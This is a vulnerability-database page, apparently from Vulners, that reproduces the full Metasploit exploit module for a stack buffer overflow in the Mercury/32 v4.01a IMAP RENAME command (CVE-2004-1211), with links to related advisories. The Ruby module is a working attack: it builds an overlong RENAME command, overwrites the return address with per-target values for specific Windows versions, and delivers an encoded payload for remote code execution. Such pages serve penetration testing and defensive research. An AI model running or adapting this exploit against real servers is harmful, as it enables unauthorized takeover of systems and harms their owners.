Lucene search
K

Mercury/32 v4.01a IMAP RENAME Buffer Overflow

🗓️ 05 Dec 2005 05:00:27Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 20 Views

Mercury/32 v4.01a IMAP RENAME Buffer Overflow in Window

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Mercury Mail Remote IMAP Stack Buffer Overflow (deprecated)
30 Nov 200400:00
nessus
Tenable Nessus
Mercury Mail Remote IMAP Server Remote Overflow
30 Nov 200400:00
nessus
Circl
CVE-2004-1211
9 May 201000:00
circl
Check Point Advisories
Preemptive Protection against Mercury Mail IMAP Buffer Overflow Vulnerability
11 Apr 200700:00
checkpoint_advisories
CVE
CVE-2004-1211
15 Dec 200405:00
cve
Cvelist
CVE-2004-1211
15 Dec 200405:00
cvelist
Exploit DB
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
NVD
CVE-2004-1211
10 Jan 200505:00
nvd
Packet Storm
Mercury/32 v4.01a IMAP RENAME Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Stack overflow
20 Sep 200721:17
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow vulnerability in the
        Mercury/32 v.4.01a IMAP service.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1211'],
          [ 'OSVDB', '12508'],
          [ 'BID', '11775'],
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=15867'],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP4 English',   { 'Ret' => 0x7846107b }],
          ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
          ['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
        ],
      'DisclosureDate' => '2004-11-29'))
  end

  def check
    connect
    resp = sock.get_once
    disconnect

    if (resp =~ /Mercury\/32 v4\.01a/)
      return Exploit::CheckCode::Appears
    end
      return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login

    sploit =  "a001 RENAME " + rand_text_alpha_upper(260)
    sploit << [target.ret].pack('V') + payload.encoded

    sock.put(sploit)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 210
EPSS0.72459
20